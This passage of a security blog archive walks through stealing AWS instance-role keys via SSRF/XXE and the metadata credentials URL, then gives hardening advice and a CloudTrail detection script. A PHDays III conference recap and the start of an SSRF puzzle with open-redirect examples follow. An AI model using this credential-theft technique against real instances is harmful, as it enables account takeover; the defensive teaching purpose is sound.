<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgse_SdYRuTiiqbfGQLxmsORI3vEv5552mGrenvN9hWmkpYmRrKZWgCN50y1n2j4GbTDlziM8nV-wupj-z9diMW7zM3scoQfUkeCUMNNq8onNtLRoRpOYzcQ4Q_N7aIjO_qFHfjSb6Yb0dc/s1600/AWS-XXE-API.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgse_SdYRuTiiqbfGQLxmsORI3vEv5552mGrenvN9hWmkpYmRrKZWgCN50y1n2j4GbTDlziM8nV-wupj-z9diMW7zM3scoQfUkeCUMNNq8onNtLRoRpOYzcQ4Q_N7aIjO_qFHfjSb6Yb0dc/s1600/AWS-XXE-API.png" height="171" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="text-align: left;">Ok... so now you can get a lot of information... but the funniest part is that the temporary Access Key and Token for the AWS API are also here: http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE_NAME>...</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYxeLeadNfxGTNfePx3BPDCsjprCfmUEHUtrlDmMBQXm-U9ebZDVAJFoFYhdcGB_bf_rz_ZXiNhntn5QqYryJcmvidhFTTafsK8n4KqKx_FcXfxCF1TsEzkbIxq2HoLOxQUSfAh8a5O8B4/s1600/AWS-XXE-KEY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYxeLeadNfxGTNfePx3BPDCsjprCfmUEHUtrlDmMBQXm-U9ebZDVAJFoFYhdcGB_bf_rz_ZXiNhntn5QqYryJcmvidhFTTafsK8n4KqKx_FcXfxCF1TsEzkbIxq2HoLOxQUSfAh8a5O8B4/s1600/AWS-XXE-KEY.png" height="253" width="400" /></a></div>
<br />
<br />
Wow, the 'apache' user got this key... and if you think that by default this key can only be used from the EC2 instance, you are wrong. Please feel free to copy this key and use it from any place.<br />
<br />
Config:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTnYuAKxmSSA6tgXDuwaxaz4ihC7fSydE887v-LkzeLSE56CQimxeNvp-SwAoqvhifxEKOWO-tOxXL6kbeYvPazlVmI1rIvhYsPa4fOAYDUGplSkJdp3n2tmQC0Nh2sgEc45I5TKWlajew/s1600/screenshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTnYuAKxmSSA6tgXDuwaxaz4ihC7fSydE887v-LkzeLSE56CQimxeNvp-SwAoqvhifxEKOWO-tOxXL6kbeYvPazlVmI1rIvhYsPa4fOAYDUGplSkJdp3n2tmQC0Nh2sgEc45I5TKWlajew/s1600/screenshot2.png" height="83" width="640" /></a></div>
<br />
<br />
Trying:<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwzyRwpfOYOKWrFI0vuU4fGk1QH-1xClU5Jpw0FFMkBEuJ9FVi57DhRUJsbmgJcceRZWFyxA2Qr3g_Qe1Gnsxq0Kx28ef9bxXn2jOYhyphenhyphenToxrcHI1c_7DRZAQpem4xBldYFzD82ke2hsmJV/s1600/screenshot.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwzyRwpfOYOKWrFI0vuU4fGk1QH-1xClU5Jpw0FFMkBEuJ9FVi57DhRUJsbmgJcceRZWFyxA2Qr3g_Qe1Gnsxq0Kx28ef9bxXn2jOYhyphenhyphenToxrcHI1c_7DRZAQpem4xBldYFzD82ke2hsmJV/s1600/screenshot.png" height="259" width="640" /></a><br />
<br />
Now we can do anything that is allowed by the Policy/Role assigned to the hacked instance.<br />
<br />
Let's summarize the problems:<br />
<br />
1) Anyone can get the Access Key: nobody, root, apache... it's not based on OS security.<br />
2) By default this Key works from any IP, not only from the instance (but you can at least try to restrict that in the Policy).<br />
3) You can't revoke this Key. You can remove the Policy from the group - yes.<br />
4) You do SSRF in your code, smart-ass!<br />
<br />
So this is just an example of how SSRF + a lack of hardening on an AWS account can ruin your life...<br />
<br />
<br />
<br />
Solution for item 2: edit the Policies that are assigned to the Role:<br />
<br />
"Condition": {<br />
"IpAddress": {<br />
"aws:SourceIp": "10.90.X.X"<br />
}<br />
}
<br />
<br />
Then you are safe:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQBgdN19Snh2AKDZia6_TvZowwp_YWjg4KTa5eCCzxnDP5SX8F-ep-IbhMFYk3g1ZQPw2cu_Yt4-1S52c6F2cM7FdHEjLe_ZXpZptsbJ6zM_DXEV_uq9qZSwiuaX_NTyGNoCqd1EpFmb5j/s1600/screenshot3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQBgdN19Snh2AKDZia6_TvZowwp_YWjg4KTa5eCCzxnDP5SX8F-ep-IbhMFYk3g1ZQPw2cu_Yt4-1S52c6F2cM7FdHEjLe_ZXpZptsbJ6zM_DXEV_uq9qZSwiuaX_NTyGNoCqd1EpFmb5j/s1600/screenshot3.png" height="47" width="400" /></a></div>
<br />
But in fact you are not - if the box is compromised, or with the same SSRF, you can make REST API calls from the pwned instance...<br />
<br />
As final notes:<br />
<br />
1) Check the roles that are assigned to instances. Fewer privileges... Better, no roles...<br />
2) If you can limit access for this policy by SRC IP - do it, so only instances with this Role can access the API.<br />
BUT remember, if you have SSRF, then an attacker can make API calls from the same instance via the same SSRF...<br />
3) Do not code SSRF ;)<br />
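<br />
A detection-side companion to note 2, as an added example that is not part of the original post: it scans CloudTrail records for API calls made with an instance role's temporary credentials from an address outside the networks that role's instances normally call from. The role name, account ID, instance ID, key IDs, IP ranges and records are all constructed; only the CloudTrail field names are real.<br />

```python
import ipaddress
import json

# Constructed baseline: networks that instances holding each role
# legitimately reach the AWS API from (their NAT/egress addresses).
EXPECTED_NETWORKS = {"build-server-role": ["198.51.100.0/24"]}

# Constructed CloudTrail records, reduced to the fields this check reads.
SAMPLE_EVENTS = json.loads("""
[
 {"eventTime": "2014-08-08T10:00:00Z", "eventName": "DescribeInstances",
  "sourceIPAddress": "198.51.100.20",
  "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLEKEY000001",
   "arn": "arn:aws:sts::111122223333:assumed-role/build-server-role/i-0a1b2c3d"}},
 {"eventTime": "2014-08-08T10:07:12Z", "eventName": "DescribeInstances",
  "sourceIPAddress": "203.0.113.77",
  "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLEKEY000001",
   "arn": "arn:aws:sts::111122223333:assumed-role/build-server-role/i-0a1b2c3d"}},
 {"eventTime": "2014-08-08T10:07:40Z", "eventName": "ListBuckets",
  "sourceIPAddress": "203.0.113.77", "errorCode": "AccessDenied",
  "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLEKEY000001",
   "arn": "arn:aws:sts::111122223333:assumed-role/build-server-role/i-0a1b2c3d"}},
 {"eventTime": "2014-08-08T10:09:00Z", "eventName": "ListBuckets",
  "sourceIPAddress": "203.0.113.77",
  "userIdentity": {"type": "IAMUser", "accessKeyId": "AKIAEXAMPLEKEY000002",
   "arn": "arn:aws:iam::111122223333:user/alice"}},
 {"eventTime": "2014-08-08T10:11:00Z", "eventName": "DescribeInstances",
  "sourceIPAddress": "203.0.113.77",
  "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLEKEY000003",
   "arn": "arn:aws:sts::111122223333:assumed-role/admin-role/deploy-session"}}
]
""")


def instance_role_session(identity):
    """Return (role, instance_id) for an EC2 instance-role caller, else None."""
    if identity.get("type") != "AssumedRole":
        return None
    parts = identity.get("arn", "").split(":")
    if len(parts) < 6 or parts[2] != "sts":
        return None
    resource = ":".join(parts[5:]).split("/")
    if len(resource) != 3 or resource[0] != "assumed-role":
        return None
    _, role, session = resource
    # Credentials handed out by the metadata service carry the instance ID
    # as the role session name; other sessions are out of scope here.
    return (role, session) if session.startswith("i-") else None


def in_expected_network(source, cidrs):
    """True/False for an IP literal; None when the source is not an IP."""
    try:
        addr = ipaddress.ip_address(source)
    except ValueError:
        return None  # e.g. an AWS service name instead of an address
    return any(addr in ipaddress.ip_network(cidr) for cidr in cidrs)


def find_offhost_use(events, expected=EXPECTED_NETWORKS):
    """List calls where instance-role credentials came from an unexpected place."""
    findings = []
    for ev in events:
        session = instance_role_session(ev.get("userIdentity", {}))
        if session is None:
            continue
        role, instance_id = session
        source = ev.get("sourceIPAddress", "")
        if role not in expected:
            reason = "no-baseline-for-role"
        else:
            verdict = in_expected_network(source, expected[role])
            if verdict is True:
                continue
            reason = "non-ip-source" if verdict is None else "unexpected-source-ip"
        findings.append({
            "time": ev.get("eventTime"),
            "event": ev.get("eventName"),
            "role": role,
            "instance": instance_id,
            "source": source,
            "access_key": ev.get("userIdentity", {}).get("accessKeyId"),
            "error": ev.get("errorCode"),  # set when the call was rejected
            "reason": reason,
        })
    return findings


if __name__ == "__main__":
    for finding in find_offhost_use(SAMPLE_EVENTS):
        print(finding)
```

A finding whose error field is set means the call was rejected, for example by a source-IP Condition like the one above, but the key still left the instance and the SSRF or compromise behind it still has to be found.<br />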
<br />
P.S. Thanks to Erian Nader from HERE Security team for helping with this material...<br />
<br />
P.P.S. And of course, it's not only about SSRF - if an instance is pwned, the same risks apply. So be careful with instance roles!<br />
<br /></div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com24tag:blogger.com,1999:blog-4711612808026791519.post-84451300524224861942013-06-07T16:09:00.001-07:002013-06-07T16:14:53.092-07:00PHDays III<div dir="ltr" style="text-align: left;" trbidi="on">
I have finally gotten around to writing up this event. I'm not what I used to be and won't type much, but I'll still share my impressions.<br />
<br />
<b>Stage 0.</b><br />
<div>
<br /></div>
<div style="text-align: justify;">
I flew in from Berlin, amusingly with a PHDays 2012 backpack, and even more amusingly there were other guys on the plane heading to the same event: Johan, Daniel (the founders of the SCADA and Computer Security Group - SCADACS) and Jeff Katz aka aestetix. So they put all of us on one plane, which is sweet. And we sat relatively close to each other 8) Remarkably, we also flew back together. That's how I got to know these nice guys. </div>
<div style="text-align: justify;">
<br />
<br />
<a name='more'></a><br /><br />
<br /></div>
<div>
<div style="text-align: justify;">
The landing did not go well: the plane tried three times to land at Vnukovo, but three times, 100-200 meters out, it hit the "afterburner" and went around for the next approach. Fog, Moscow... and the pilots complained about something not working, nothing critically important, but needed right now for landing in such conditions. In short, not the most pleasant impressions, but at least there is something to write in the blog 8) In the end the captain decided to fly to Domodedovo, where we landed safely. A cheerful Jeff said that we were about to be met... but I disappointed him by saying that it was the wrong airport. Johan and Daniel waited for the organizers to send a taxi for them, and Jeff decided to join me: Aeroexpress, the Metro, a short walk (15-20 min) towards the hotel. That's how we got there. </div>
<br />
<br />
A photo from that day is attached (the view from the hotel).</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuWVPR_W-CGiMWfsRIuLho6ddxOIU-BBcmGvweqEmwqdc2Mb4vk93vaQfFeqQJkzOVD7X1YbQVYMP0vbtr5eAJa4VMBpDouR7E6yhMvvckjHrpjBZt-jWApLyLFvV6EO8d6Tlt3PDDG9jA/s1600/WP_20130522_026%5B1%5D.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuWVPR_W-CGiMWfsRIuLho6ddxOIU-BBcmGvweqEmwqdc2Mb4vk93vaQfFeqQJkzOVD7X1YbQVYMP0vbtr5eAJa4VMBpDouR7E6yhMvvckjHrpjBZt-jWApLyLFvV6EO8d6Tlt3PDDG9jA/s400/WP_20130522_026%5B1%5D.jpg" width="400" /></a></div>
<div>
<br /></div>
<div>
<b>Stage 1.</b></div>
<div>
<b><br /></b></div>
<div style="text-align: justify;">
The first day is, of course, about meeting old friends. So blame me all you like, but I basically did not go to the talks 8) So don't expect reviews of what was cool (yes, yes). Nevertheless I was really lucky (thanks to the organizers) that my talk was scheduled as one of the first, which makes the rest of the time much easier ;) So, I somehow delivered my talk, speaking in a track parallel to the best super-speakers, Alexey Lukatsky and Vladimir Zhirinovsky; I thought nobody would come to my talk... but thanks to those who came! You are cool! And those in the other hall are posers and not tru 8)))</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
(By the way, about <a href="http://dlp-expert.ru/survey/bestspeaker">http://dlp-expert.ru/survey/bestspeaker</a> , now we only need to add Vladimir Volfovich so that he knocks Alexey right out of the leaders!)</div>
<div style="text-align: justify;">
<br /></div>
<div>
<div style="text-align: justify;">
After my talk I was escorted to the speakers' room, for hungry was I, and the organizers, the kindest people, took care of me! But here come Russian realities. Volodya, after his speech, apparently also decided to treat himself to the speakers' buns, so his bodyguard blocked our way. There's democracy for you! All speakers are equal! Everyone to the barricades, down with the lords, look what they've come up with - devouring the people's buns! But there has already been a post about food, so I won't continue this topic ;) </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
On the first day, in one of the rooms there was a __secret meeting__! We were not let in... But of course I took a photo... a secret meeting behind a glass door - here it is, the future of Russian infosec:</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMAAPlWXK947THNK_jVStaTWZiQh5GZCxYbQZugNFnrDXGo0CWNBZnNSxpOalOWRNfyRmTo2XFj7MTiQZoDSPZ5dyZaRpvRJK_Lzv-Jv01p5lsxhCQUIH2eisA-AlacBugjdLpJPUWLLh5/s1600/WP_20130523_009%5B1%5D.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMAAPlWXK947THNK_jVStaTWZiQh5GZCxYbQZugNFnrDXGo0CWNBZnNSxpOalOWRNfyRmTo2XFj7MTiQZoDSPZ5dyZaRpvRJK_Lzv-Jv01p5lsxhCQUIH2eisA-AlacBugjdLpJPUWLLh5/s400/WP_20130523_009%5B1%5D.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
<span style="text-align: left;">Something could be made out on the whiteboard; unfortunately I didn't bother to photograph the board, so here are the faces of the "spies". By the way, after this photo we were asked not to do that again... </span></div>
<span style="text-align: left;"></span><br />
<div style="text-align: justify;">
<span style="text-align: left;">It gets better: an hour later I had a work incident, and I started looking for a secluded, quiet spot to calmly bring up the VPN and sort out the situation. So I was sitting quietly in some little corridor and suddenly I hear a man come in (into my little corridor); he doesn't see me (I'm behind a pillar) or hear me, and he starts chatting on the phone about exactly this "secret meeting". I heard the full name of a certain FSB officer, his rank (colonel, I think, no idea), then something about the security of SCADA at the Sochi facilities and the problems that exist there. I'm glad that someone is dealing with this and that these problems are discussed at, as we can see, the very highest level. The country is safe! PHDays provided a venue for discussing these problems, which is, of course, great! </span></div>
<span style="text-align: left;">
</span>
<b style="text-align: left;"><br /></b>
<br />
<div class="separator" style="clear: both; text-align: justify;">
<span style="text-align: left;"><b>Stage 2.</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br style="text-align: left;" /></div>
<div style="text-align: justify;">
<span style="text-align: left;">The second day was just as cool - I hung out with good friends, but this time we also took part in the mega-fun contest, the Labyrinth. Everyone knows and has read about it, so I'll be brief: we failed. We passed the first level (the thermal sensor), but unfortunately only after our time had run out(. Social engineering went badly... we started thinking in the wrong direction and got stuck in a loop (we were later told how it should have been done... ehh). With the lasers - well, fat backsides and "so-so" coordination did not let us squeeze between the beams 8( Bug hunting - we found 3 of 4. We found 3 quickly, and searched for the 4th for a long, long time. But we dealt with the lock picks quickly and efficiently (the night training at Bolotnaya paid off...). As our "supervisor" told us, on locks we were in second place after the Americans. Well. At least something we managed to do well. The rest - no way. And the bomb exploded; we couldn't be bothered to simplify the equation, so we mostly argued 8) In short, the contest is really great. We liked it. </span></div>
<br />
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO42xJyjyOEHMshWKQBjLrwXHEpTz4pfe4G0pG5f5EtR2TGZkFV4v9gZtIBrQ72DcVFyjR6rkED6_B1h9kwjmIjs68GeGE0y9XHb_G5TPD2aVRB_8aW9Z_txS8QMER0esnaKbTFkc2ag_C/s1600/WP_20130524_009%5B1%5D.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO42xJyjyOEHMshWKQBjLrwXHEpTz4pfe4G0pG5f5EtR2TGZkFV4v9gZtIBrQ72DcVFyjR6rkED6_B1h9kwjmIjs68GeGE0y9XHb_G5TPD2aVRB_8aW9Z_txS8QMER0esnaKbTFkc2ag_C/s400/WP_20130524_009%5B1%5D.jpg" width="400" /></a></div>
<div>
<br />
<br />
<b>Final.</b></div>
<div>
<b><br /></b></div>
<div>
As you may have noticed, this write-up is about absolutely nothing. Yes, I didn't go to the talks, I only played in the contest. I spent all the time hanging out with friends. In fact, the conference was less pompous in style than last year, but nevertheless better thought out, as it seemed to me, in terms of its "script". Though that's IMHO. There were not enough places to socialize 8) On average the list of talks was not "exciting", but there were two or three talks with strong, good topics, really. The idea of mixing suits and T-shirts is flawed and looks forced and artificial; you can still feel how alien the two crowds are to each other. Yes, some write that everyone found "each other", but IMHO there were two separate cliques. Suits with suits, and T-shirts with T-shirts. Thanks to the organizers! Thanks to those who listened to the talks and were on the wave (unlike me). See you at <b>Zeronights</b>.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF0B8tRbkfcOEiuDdMzogdoucggGjhNozM38s2PAlPBMa1l_c9fELPyPfVoO9P6S2bZdvTBsZdMZTVi0hgiq1DLee9iXXvI3cDpCS1mS3lStycoZ3SnHR-VxTwkeakt3lBDMDAhk4lTBXj/s1600/WP_20130523_003%5B1%5D.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF0B8tRbkfcOEiuDdMzogdoucggGjhNozM38s2PAlPBMa1l_c9fELPyPfVoO9P6S2bZdvTBsZdMZTVi0hgiq1DLee9iXXvI3cDpCS1mS3lStycoZ3SnHR-VxTwkeakt3lBDMDAhk4lTBXj/s400/WP_20130523_003%5B1%5D.jpg" width="400" /></a></div>
<div>
<br /></div>
<div>
<br />
<br />
<br />
<br /></div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com0tag:blogger.com,1999:blog-4711612808026791519.post-52097329516998014572013-01-07T05:35:00.001-08:002014-10-23T03:07:53.054-07:00An interesting case with SSRF.<div dir="ltr" style="text-align: left;" trbidi="on">
<b id="internal-source-marker_0.3253475003875792"><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Lately, on the Internets and in the narrow circle of infosec specialists, the concepts, examples and techniques of a “new” attack, SSRF, have been actively discussed. I would like to tell you about one such attack. This case is also interesting because it is hard to classify by the existing “threat-vulnerability” yardsticks. That is, there is a concrete attack and a concrete threat is realized, but if you analyze the “vulnerabilities” separately, the threats are different. And this example, in my humble opinion, shows that “infosec theory” and classification in our field lag far behind practice and are not always applicable in their current form.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" />“Hack me completely”</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span></b><br />
<a name='more'></a><b id="internal-source-marker_0.3253475003875792"><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">As background, for those who don't know what an SSRF attack is, I recommend reading: <a href="http://andrepetukhov.wordpress.com/2012/11/09/%D1%82%D0%B5%D1%80%D0%BC%D0%B8%D0%BD%D1%8B-xxe-ssrf-%D0%B8-%D0%B2%D1%81%D0%B5-%D0%B2%D1%81%D0%B5-%D0%B2%D1%81%D0%B5/">http://andrepetukhov.wordpress.com/2012/11/09/%D1%82%D0%B5%D1%80%D0%BC%D0%B8%D0%BD%D1%8B-xxe-ssrf-%D0%B8-%D0%B2%D1%81%D0%B5-%D0%B2%D1%81%D0%B5-%D0%B2%D1%81%D0%B5/</a><br class="kix-line-break" /><br class="kix-line-break" />For everyone else, briefly: SSRF - Server-Side-Request-Forgery. The essence: an attack that lets us initiate requests from the attacked host </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">B</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"> to other components of the system, for example to host </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">C</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">. At the same time we have no direct way to send such a request to host </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">C</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">. For example, host </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">C</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"> is in the local network/DMZ. This way we can do various interesting things. 
In some interesting variants, host </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">C</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"> can be the same host </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">B</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">, just a local network interface that is not reachable from the Internets (that is, by the attacker). </span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">In this post I want to tell you about another interesting case of an SSRF attack. Or actually, no! Let's make it interactive: I'll describe the system to you, and you carry out the attack yourselves in the comments! I'll send or hand the winner a prize - a rubber duck 8)</span></b><br />
<span style="font-family: Arial;"><span style="font-size: 15.199999809265137px; white-space: pre-wrap;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://pbs.twimg.com/media/A3KAUOaCQAEEgKN.jpg:large" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://pbs.twimg.com/media/A3KAUOaCQAEEgKN.jpg:large" width="320" /></a></div>
<span style="font-family: Arial;"><span style="font-size: 15.199999809265137px; white-space: pre-wrap;"><br /></span></span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span>
<span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"><i>//Answers from Andrey Petukhov, Vladimir Vorontsov and Sasha Shtuker are not accepted =)</i><br class="kix-line-break" /><br class="kix-line-break" />Given:</span><br />
<span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;"><br class="kix-line-break" />There is a network of services, but only one of them will be of interest to us. </span>S1<span style="font-weight: normal;">: A server with personal data. It has to be “hacked”. Authorization is Single Sign-On. </span></span><br />
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<b id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Host: s1.domain.com<br class="kix-line-break" /><span class="Apple-tab-span" style="white-space: pre;"> </span></span></b></div>
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<b id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">//Vulnerability 1 - open-redirect - https://s1.domain.com/?url=http://ya.ru</span></b></div>
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<b id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></b></div>
<span id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;">Of course there is an SSO server. </span>SSO</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">: The authorization server.</span><br /><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> <b> </b></span><b>Host: sso.domain.com</b><br class="kix-line-break" /><span class="Apple-tab-span" style="font-weight: normal; white-space: pre;"> </span></span><br /><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> <b> </b></span><b>//Vulnerability 2 - redirect: https://sso.domain.com/?afterauth=http://s1.domain.com<br class="kix-line-break" /><span class="Apple-tab-span" style="white-space: pre;"> </span>//the redirect works only for the home domain and the list of services!</b><br class="kix-line-break" /><br class="kix-line-break" />Documentation:<br class="kix-line-break" /><span class="Apple-tab-span" style="font-weight: normal; white-space: pre;"> </span>The service performs authorization via the REST API.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>1. Authentication. 
Start.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>1.1. Service</span><span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> S1</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"> checks the ‘code’ cookie. If it is not empty, goto 2.</span></span><br />
<div style="text-indent: 0px;">
<span style="font-family: Arial; font-size: 15px; text-indent: 36pt; white-space: pre-wrap;"> 1.2. The service redirects to the </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-indent: 36pt; white-space: pre-wrap;">SSO</span><span style="font-family: Arial; font-size: 15px; text-indent: 36pt; white-space: pre-wrap;"> service: https://sso.domain.com/getAuth?ID=S1</span></div>
<div style="text-indent: 0px;">
<span style="font-family: Arial; font-size: 15px; text-indent: 48px; white-space: pre-wrap;"> 1.3. </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-indent: 48px; white-space: pre-wrap;">SSO</span><span style="font-family: Arial; font-size: 15px; text-indent: 48px; white-space: pre-wrap;"> checks PHPSESSIONID; if there is authentication data for this session, it redirects back according to the parameter ID=S1: https://s1.domain.com/authDone?code=0cc1166f5a3012a1bc3eafff018acb31, where code is taken from the session data for the corresponding ID. If there is no code there, goto 1.7</span></div>
<div dir="ltr" style="font-weight: bold; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;">If the session is not authenticated, goto 1.6</span></span></span><br />
<span style="font-family: Arial; font-size: 15px; font-weight: normal; white-space: pre-wrap;">1.4. </span><span style="font-family: Arial; font-size: 15px; white-space: pre-wrap;">S1</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; white-space: pre-wrap;"> sets the code cookie from the code parameter.</span></div>
<span id="internal-source-marker_0.3253475003875792">
</span>
<br />
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">1.5. goto 1.1</span></span></div>
<span id="internal-source-marker_0.3253475003875792">
</span>
<br />
<div dir="ltr" style="font-weight: bold; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
